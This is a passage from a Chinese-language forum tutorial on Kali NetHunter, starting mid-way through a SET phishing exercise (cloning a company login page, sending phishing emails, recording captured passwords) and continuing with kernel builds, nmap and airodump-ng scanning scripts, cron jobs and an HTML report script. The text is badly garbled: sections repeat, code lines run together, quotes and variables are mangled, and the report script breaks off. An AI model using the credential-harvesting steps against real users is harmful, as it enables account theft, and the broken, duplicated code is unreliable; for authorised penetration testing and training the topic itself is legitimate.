  1. setoolkit
复制代码

创建钓鱼网站:

• 选择”网站攻击向量”。
• 选择”克隆网站”。
• 输入要克隆的网站URL(如公司登录页面)。
• 设置NetHunter作为托管钓鱼网站的服务器。

发送钓鱼邮件:

• 使用SET创建钓鱼邮件模板。
• 配置SMTP服务器设置。
• 发送钓鱼邮件给目标用户。

捕获凭证:

• 监控SET日志,查看是否有用户点击链接并输入凭证。
• 记录捕获的用户名和密码。

报告结果:

• 记录测试结果和成功/失败率。
• 提供安全建议,如加强员工安全意识培训、实施多因素认证等。

高级技巧

自定义配置

1. 自定义内核:NetHunter允许用户编译自定义内核以支持特定硬件或功能。下载NetHunter内核源代码:git clone https://github.com/rek2/nethunter-kernel.git配置内核选项:make menuconfig编译内核:make -j4
2. NetHunter允许用户编译自定义内核以支持特定硬件或功能。
3. 下载NetHunter内核源代码:git clone https://github.com/rek2/nethunter-kernel.git
4. 配置内核选项:make menuconfig
5. 编译内核:make -j4
6. 自定义工具集:添加额外的Kali Linux工具:apt update
apt install tool-name创建自定义脚本和工具:nano /usr/local/bin/custom-tool.sh
chmod +x /usr/local/bin/custom-tool.sh
7. 添加额外的Kali Linux工具:apt update
apt install tool-name
8. 创建自定义脚本和工具:nano /usr/local/bin/custom-tool.sh
chmod +x /usr/local/bin/custom-tool.sh
9. 自定义启动脚本:编辑NetHunter启动脚本:nano /etc/init.d/nethunter添加自定义命令或服务。
10. 编辑NetHunter启动脚本:nano /etc/init.d/nethunter
11. 添加自定义命令或服务。

自定义内核:

• NetHunter允许用户编译自定义内核以支持特定硬件或功能。
• 下载NetHunter内核源代码:git clone https://github.com/rek2/nethunter-kernel.git
• 配置内核选项:make menuconfig
• 编译内核:make -j4
  1. git clone https://github.com/rek2/nethunter-kernel.git
复制代码
  1. make menuconfig
复制代码
  1. make -j4
复制代码

自定义工具集:

• 添加额外的Kali Linux工具:apt update
apt install tool-name
• 创建自定义脚本和工具:nano /usr/local/bin/custom-tool.sh
chmod +x /usr/local/bin/custom-tool.sh
  1. apt update
  2. apt install tool-name
复制代码
  1. nano /usr/local/bin/custom-tool.sh
  2. chmod +x /usr/local/bin/custom-tool.sh
复制代码

自定义启动脚本:

• 编辑NetHunter启动脚本:nano /etc/init.d/nethunter
• 添加自定义命令或服务。
  1. nano /etc/init.d/nethunter
复制代码

脚本编写

1.
  1. Bash脚本示例:创建自动化网络扫描脚本:
  2. “`bash
  3. #!/bin/bash自动化网络扫描脚本# 设置网络范围
  4. NETWORK=“192.168.1.0/24”# 创建输出目录
  5. mkdir -p /sdcard/scan_results# 执行主机发现
  6. nmap -sn $NETWORK -oN /sdcard/scan_results/host_discovery.txt# 从结果中提取活动主机
  7. grep “Nmap scan report” /sdcard/scan_results/host_discovery.txt | awk ‘{print $5}’ > /sdcard/scan_results/active_hosts.txt# 对每个活动主机进行端口扫描
  8. while read host; doecho "Scanning $host..."
  9. nmap -sV -O $host -oN /sdcard/scan_results/scan_$host.txtdone < /sdcard/scan_results/active_hosts.txtecho “Scan completed. Results saved to /sdcard/scan_results/”- 保存并设置可执行权限:chmod +x /usr/local/bin/auto_scan.sh
  10. “`
复制代码
2. 创建自动化网络扫描脚本:
“`bash
#!/bin/bash自动化网络扫描脚本
3.
  1. Python脚本示例:创建自动化WiFi扫描脚本:
  2. “`python
  3. #!/usr/bin/env python自动化WiFi扫描脚本import subprocess
  4. import timedef start_monitor_mode(interface):print(f"Starting monitor mode on {interface}...")
  5. subprocess.run(["airmon-ng", "start", interface])
  6. return interface + "mon"def scan_networks(interface):print("Scanning for networks...")
  7. subprocess.run(["airodump-ng", interface, "-w", "/sdcard/wifi_scan"])def stop_monitor_mode(interface):print(f"Stopping monitor mode on {interface}...")
  8. subprocess.run(["airmon-ng", "stop", interface])ifname== “main”:# 设置无线接口
  9. wifi_interface = "wlan0"
  10. # 启动监听模式
  11. mon_interface = start_monitor_mode(wifi_interface)
  12. try:
  13.      # 扫描网络
  14.      scan_networks(mon_interface)
  15. except KeyboardInterrupt:
  16.      print("\nScan interrupted by user.")
  17. finally:
  18.      # 停止监听模式
  19.      stop_monitor_mode(mon_interface)- 保存并设置可执行权限:chmod +x /usr/local/bin/auto_wifi_scan.py
  20. “`
复制代码
4. 创建自动化WiFi扫描脚本:
“`python
#!/usr/bin/env python自动化WiFi扫描脚本

Bash脚本示例:

• 创建自动化网络扫描脚本:
“`bash
#!/bin/bash自动化网络扫描脚本

创建自动化网络扫描脚本:
“`bash
#!/bin/bash

# 设置网络范围
NETWORK=“192.168.1.0/24”

# 创建输出目录
mkdir -p /sdcard/scan_results

# 执行主机发现
nmap -sn $NETWORK -oN /sdcard/scan_results/host_discovery.txt

# 从结果中提取活动主机
grep “Nmap scan report” /sdcard/scan_results/host_discovery.txt | awk ‘{print $5}’ > /sdcard/scan_results/active_hosts.txt

# 对每个活动主机进行端口扫描
while read host; do
  1. echo "Scanning $host..."
  2. nmap -sV -O $host -oN /sdcard/scan_results/scan_$host.txt
复制代码

done < /sdcard/scan_results/active_hosts.txt

echo “Scan completed. Results saved to /sdcard/scan_results/”
  1. - 保存并设置可执行权限:
复制代码

chmod +x /usr/local/bin/auto_scan.sh
“`

Python脚本示例:

• 创建自动化WiFi扫描脚本:
“`python
#!/usr/bin/env python自动化WiFi扫描脚本

创建自动化WiFi扫描脚本:
“`python
#!/usr/bin/env python

import subprocess
import time

def start_monitor_mode(interface):
  1. print(f"Starting monitor mode on {interface}...")
  2. subprocess.run(["airmon-ng", "start", interface])
  3. return interface + "mon"
复制代码

def scan_networks(interface):
  1. print("Scanning for networks...")
  2. subprocess.run(["airodump-ng", interface, "-w", "/sdcard/wifi_scan"])
复制代码

def stop_monitor_mode(interface):
  1. print(f"Stopping monitor mode on {interface}...")
  2. subprocess.run(["airmon-ng", "stop", interface])
复制代码

ifname== “main”:
  1. # 设置无线接口
  2. wifi_interface = "wlan0"
  3. # 启动监听模式
  4. mon_interface = start_monitor_mode(wifi_interface)
  5. try:
  6.      # 扫描网络
  7.      scan_networks(mon_interface)
  8. except KeyboardInterrupt:
  9.      print("\nScan interrupted by user.")
  10. finally:
  11.      # 停止监听模式
  12.      stop_monitor_mode(mon_interface)
复制代码
  1. - 保存并设置可执行权限:
复制代码

chmod +x /usr/local/bin/auto_wifi_scan.py
“`

自动化任务

1. 使用Cron安排定期任务:编辑Crontab:crontab -e添加定期任务,如每天凌晨2点执行网络扫描:0 2 * * * /usr/local/bin/auto_scan.sh
2. 编辑Crontab:crontab -e
3. 添加定期任务,如每天凌晨2点执行网络扫描:0 2 * * * /usr/local/bin/auto_scan.sh
4.
  1. 创建自动化报告:创建脚本生成HTML格式的扫描报告:
  2. “`bash
  3. #!/bin/bash生成HTML报告REPORTDIR=”/sdcard/reports”
  4. DATE=$(date +%Y%m%d%H%M%S)
  5. REPORT_FILE=”\(REPORT_DIR/report_\)DATE.html”# 创建报告目录
  6. mkdir -p $REPORT_DIR# 开始HTML报告
  7. cat << EOF > $REPORT_FILE
  8. <!DOCTYPE html><title>Security Scan Report - $DATE</title>
  9. <style>
  10.      body { font-family: Arial, sans-serif; margin: 20px; }
  11.      h1 { color: #333; }
  12.      h2 { color: #666; }
  13.      pre { background-color: #f5f5f5; padding: 10px; border-radius: 5px; }
  14. </style><h1>Security Scan Report</h1>
  15. <p>Generated on: $(date)</p>EOF# 添加网络扫描结果
  16. echo “Network Scan Results” >>\(REPORT_FILE
  17. echo "<pre>" >> \)REPORT_FILE
  18. cat /sdcard/scan_results/host_discovery.txt >>\(REPORT_FILE
  19. echo "</pre>" >> \)REPORT_FILE# 添加端口扫描结果
  20. echo “Port Scan Results” >> $REPORT_FILE
  21. while read host; doecho "<h3>Host: $host</h3>" >> $REPORT_FILE
  22. echo "<pre>" >> $REPORT_FILE
  23. cat /sdcard/scan_results/scan_$host.txt >> $REPORT_FILE
  24. echo "</pre>" >> $REPORT_FILEdone < /sdcard/scan_results/active_hosts.txt# 结束HTML报告
  25. cat << EOF >> $REPORT_FILE
复制代码
5. 创建脚本生成HTML格式的扫描报告:
“`bash
#!/bin/bash生成HTML报告

使用Cron安排定期任务:

• 编辑Crontab:crontab -e
• 添加定期任务,如每天凌晨2点执行网络扫描:0 2 * * * /usr/local/bin/auto_scan.sh
  1. crontab -e
复制代码
  1. 0 2 * * * /usr/local/bin/auto_scan.sh
复制代码

创建自动化报告:

• 创建脚本生成HTML格式的扫描报告:
“`bash
#!/bin/bash生成HTML报告

创建脚本生成HTML格式的扫描报告:
“`bash
#!/bin/bash

REPORTDIR=”/sdcard/reports”
DATE=$(date +%Y%m%d%H%M%S)
REPORT_FILE=”\(REPORT_DIR/report_\)DATE.html”

# 创建报告目录
mkdir -p $REPORT_DIR

# 开始HTML报告
cat << EOF > $REPORT_FILE
<!DOCTYPE html>
  1. <title>Security Scan Report - $DATE</title>
  2. <style>
  3.      body { font-family: Arial, sans-serif; margin: 20px; }
  4.      h1 { color: #333; }
  5.      h2 { color: #666; }
  6.      pre { background-color: #f5f5f5; padding: 10px; border-radius: 5px; }
  7. </style>
复制代码
  1. <h1>Security Scan Report</h1>
  2. <p>Generated on: $(date)</p>
复制代码

EOF

# 添加网络扫描结果
echo “Network Scan Results” >>\(REPORT_FILE
echo "<pre>" >> \)REPORT_FILE
cat /sdcard/scan_results/host_discovery.txt >>\(REPORT_FILE
echo "</pre>" >> \)REPORT_FILE

Network Scan Results

# 添加端口扫描结果
echo “Port Scan Results” >> $REPORT_FILE
while read host; do

Port Scan Results
  1. echo "<h3>Host: $host</h3>" >> $REPORT_FILE
  2. echo "<pre>" >> $REPORT_FILE
  3. cat /sdcard/scan_results/scan_$host.txt >> $REPORT_FILE
  4. echo "</pre>" >> $REPORT_FILE
复制代码

done < /sdcard/scan_results/active_hosts.txt

# 结束HTML报告
cat << EOF >> $REPORT_FILE
「七転び八起き(ななころびやおき)」
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

加入Discord频道

加入Discord频道

加入QQ社群

加入QQ社群

联系我们|小黑屋|TG频道|RSS |网站地图

Powered by Pixtech

© 2025-2026 Pixtech Team.